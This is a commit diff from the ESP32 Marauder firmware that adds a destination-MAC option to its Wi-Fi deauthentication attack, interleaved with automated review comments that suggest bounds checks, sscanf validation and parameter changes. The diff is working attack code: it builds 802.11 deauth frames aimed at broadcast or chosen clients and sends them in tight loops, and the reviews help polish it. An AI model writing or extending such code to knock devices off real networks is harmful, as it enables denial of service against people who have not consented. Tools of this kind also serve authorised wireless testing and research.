Just Call Me Koko 3 лет назад
Родитель
Сommit
d460273c91

+ 8 - 0
esp32_marauder/CommandLine.cpp

@@ -345,6 +345,14 @@ void CommandLine::runCommand(String input) {
         // Branch on attack type
         // Deauth
         if (attack_type == ATTACK_TYPE_DEAUTH) {
+          if (dst_addr_sw == -1) {
+            Serial.println("Sending to broadcast...");
+            wifi_scan_obj.dst_mac = "ff:ff:ff:ff:ff:ff";
+          }
+          else {
+            wifi_scan_obj.dst_mac = cmd_args.get(dst_addr_sw + 1);
+            Serial.println("Sending to " + wifi_scan_obj.dst_mac + "...");
+          }
           if (src_addr_sw == -1) {
             if (!this->apSelected()) {
               Serial.println("You don't have any targets selected. Use " + (String)SEL_CMD);
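Review bot: The new else branch reads `cmd_args.get(dst_addr_sw + 1)` without confirming that a value actually follows `-d`; when the switch is the last token the index is one past the end, and the result depends on what `cmd_args.get` returns for an out-of-range index (presumably an empty String, which then reaches the MAC parse in WiFiScan.cpp unvalidated). Comparing `dst_addr_sw + 1` against the argument count before the read and printing a usage error instead of continuing, along the lines of `if (<no argument after -d>) { Serial.println("-d requires a MAC"); return; }`, keeps the command from proceeding with an empty destination. runCommand starts and ends outside the hunk, and the `-s` branch that follows may have the same pattern.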

+ 1 - 1
esp32_marauder/CommandLine.h

@@ -87,7 +87,7 @@ const char PROGMEM HELP_SNIFF_PMKID_CMD[] = "sniffpmkid [-c <channel>]";
 const char PROGMEM HELP_STOPSCAN_CMD[] = "stopscan";
 
 // WiFi attack
-const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-s <src mac>]/probe/rickroll>";
+const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-s <src mac>] [-d <dst mac>]/probe/rickroll>";
 
 // WiFi Aux
 const char PROGMEM HELP_LIST_AP_CMD_A[] = "list -s";

+ 16 - 4
esp32_marauder/WiFiScan.cpp

@@ -372,6 +372,8 @@ bool WiFiScan::shutdownWiFi() {
     esp_wifi_set_promiscuous(false);
     WiFi.disconnect();
     WiFi.mode(WIFI_OFF);
+
+    dst_mac = "ff:ff:ff:ff:ff:ff";
   
     esp_wifi_set_mode(WIFI_MODE_NULL);
     esp_wifi_stop();
@@ -1887,8 +1889,12 @@ void WiFiScan::deauthSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type
       Serial.print(snifferPacket->rx_ctrl.channel);
       Serial.print(" BSSID: ");
       char addr[] = "00:00:00:00:00:00";
+      char dst_addr[] = "00:00:00:00:00:00";
       getMAC(addr, snifferPacket->payload, 10);
+      getMAC(dst_addr, snifferPacket->payload, 4);
       Serial.print(addr);
+      Serial.print(" -> ");
+      Serial.print(dst_addr);
       display_string.concat(text_table4[0]);
       display_string.concat(snifferPacket->rx_ctrl.rssi);
 
@@ -2364,7 +2370,7 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) {
   }
 }
 
-void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
+void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str) {
   // Itterate through all access points in list
   // Check if active
   WiFiScan::set_channel = channel;
@@ -2372,6 +2378,9 @@ void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
   delay(1);
   
   // Build packet
+
+  sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx", 
+        &deauth_frame_default[4], &deauth_frame_default[5], &deauth_frame_default[6], &deauth_frame_default[7], &deauth_frame_default[8], &deauth_frame_default[9]);
   
   deauth_frame_default[10] = bssid[0];
   deauth_frame_default[11] = bssid[1];
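Review bot: The return value of the new `sscanf` under "Build packet" is ignored, so a malformed or short `dst_mac_str` converts fewer than six fields and leaves the remaining bytes of `deauth_frame_default[4..9]` at whatever the previous call stored, and the frame goes out with a half-updated address. Checking for exactly six conversions and bailing out otherwise, `if (sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx", ...) != 6) return;`, is the minimal fix; the identical call added to sendDeauthAttack in the next hunk needs the same check. Since the string does not change between calls and main() invokes these functions 55 times per tick, parsing the MAC once into a six-byte array at the point where dst_mac is set would also avoid re-parsing the same text on every frame. sendDeauthFrame's signature is in the previous hunk and its body continues past this one.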
@@ -2395,7 +2404,7 @@ void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
   packets_sent = packets_sent + 3;
 }
 
-void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
+void WiFiScan::sendDeauthAttack(uint32_t currentTime, String dst_mac_str) {
   // Itterate through all access points in list
   for (int i = 0; i < access_points->size(); i++) {
 
@@ -2406,6 +2415,9 @@ void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
       delay(1);
       
       // Build packet
+
+      sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx", 
+            &deauth_frame_default[4], &deauth_frame_default[5], &deauth_frame_default[6], &deauth_frame_default[7], &deauth_frame_default[8], &deauth_frame_default[9]);
       
       deauth_frame_default[10] = access_points->get(i).bssid[0];
       deauth_frame_default[11] = access_points->get(i).bssid[1];
@@ -3189,7 +3201,7 @@ void WiFiScan::main(uint32_t currentTime)
   }
   else if (currentScanMode == WIFI_ATTACK_DEAUTH) {
     for (int i = 0; i < 55; i++)
-      this->sendDeauthAttack(currentTime);
+      this->sendDeauthAttack(currentTime, this->dst_mac);
 
     if (currentTime - initTime >= 1000) {
       initTime = millis();
@@ -3209,7 +3221,7 @@ void WiFiScan::main(uint32_t currentTime)
   }
   else if (currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) {
     for (int i = 0; i < 55; i++)
-      this->sendDeauthFrame(this->src_mac, this->set_channel);
+      this->sendDeauthFrame(this->src_mac, this->set_channel, this->dst_mac);
 
     if (currentTime - initTime >= 1000) {
       initTime = millis();

+ 3 - 3
esp32_marauder/WiFiScan.h

@@ -235,8 +235,8 @@ class WiFiScan
     void tftDrawColorKey();
     void tftDrawGraphObjects();
     void sendProbeAttack(uint32_t currentTime);
-    void sendDeauthAttack(uint32_t currentTime);
-    void sendDeauthFrame(uint8_t bssid[6], int channel);
+    void sendDeauthAttack(uint32_t currentTime, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
+    void sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
     void broadcastRandomSSID(uint32_t currentTime);
     void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
     void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid);
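Review bot: Both new declarations take `String dst_mac_str` by value, so every call copies an Arduino String (a heap allocation on most cores), and main() makes 55 such calls per tick; `const String& dst_mac_str = "ff:ff:ff:ff:ff:ff"` keeps the default while avoiding the copy, with the matching change in the WiFiScan.cpp definitions. The second hunk also changes `dst_mac` from `byte[6]` to `String`, so any code outside this diff that still indexes dst_mac as a byte array would no longer compile — worth confirming nothing else references it. The class declaration extends beyond both hunks.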
@@ -283,7 +283,7 @@ class WiFiScan
     String old_free_ram = "";
     String connected_network = "";
 
-    byte dst_mac[6] = {};
+    String dst_mac = "ff:ff:ff:ff:ff:ff";
     byte src_mac[6] = {};
 
     //lv_obj_t * scr = lv_cont_create(NULL, NULL);

+ 3 - 3
esp32_marauder/configs.h

@@ -4,14 +4,14 @@
 
   #define POLISH_POTATO
   
-  //#define MARAUDER_MINI
+  #define MARAUDER_MINI
   //#define MARAUDER_V4
   //#define MARAUDER_V6
   //#define MARAUDER_KIT
   //#define GENERIC_ESP32
-  #define MARAUDER_FLIPPER
+  //#define MARAUDER_FLIPPER
 
-  #define MARAUDER_VERSION "v0.9.16"
+  #define MARAUDER_VERSION "v0.9.17"
 
   //// BUTTON DEFINITIONS
   #ifdef MARAUDER_MINI
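Review bot: Besides the version bump, this hunk flips the selected board from `MARAUDER_FLIPPER` to `MARAUDER_MINI`, which changes the default build target for anyone building from this commit; if that is a local build setting rather than an intended change, it should be reverted here and kept out of the feature commit. The `MARAUDER_VERSION` change to v0.9.17 is fine on its own.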